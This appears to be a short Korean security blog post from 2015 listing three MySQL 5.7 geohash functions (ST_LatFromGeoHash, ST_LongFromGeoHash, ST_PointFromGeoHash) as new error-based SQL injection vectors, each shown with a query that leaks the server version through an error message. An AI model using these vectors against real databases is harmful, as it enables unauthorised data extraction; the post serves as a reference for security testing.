본문으로 바로가기

New Error Based SQL Injection in MySQL >= 5.7.5

category Security/Web 2015. 4. 5. 20:04
반응형

1. ST_LatFromGeoHash()

mysql> select ST_LatFromGeoHash(version());

-> ERROR 1411 (HY000): Incorrect geohash value: '5.7.6-community' for function ST_LATFROMGEOHASH


2. ST_LongFromGeoHash()

mysql> select ST_LongFromGeoHash(version());

-> ERROR 1411 (HY000): Incorrect geohash value: '5.7.6-community' for function ST_LONGFROMGEOHASH


3. ST_PointFromGeoHash()

mysql> select ST_PointFromGeoHash(version(),0);

-> ERROR 1411 (HY000): Incorrect geohash value: '5.7.6-community' for function st_pointfromgeohash


출처 : http://dsrbr.blogspot.ru/2015/03/new-error-based-sql-injection-vectors.html?m=1

반응형

'Security > Web' 카테고리의 다른 글

2016 Codegate Hack No-Jam(Web)  (0) 2016.03.14
PHP Object Injection  (0) 2016.02.19
Natas 11  (0) 2015.03.05
Limit 구문에서의 SQL Injection  (2) 2015.02.27
문자열함수를 이용한 SQL Injection  (2) 2015.01.29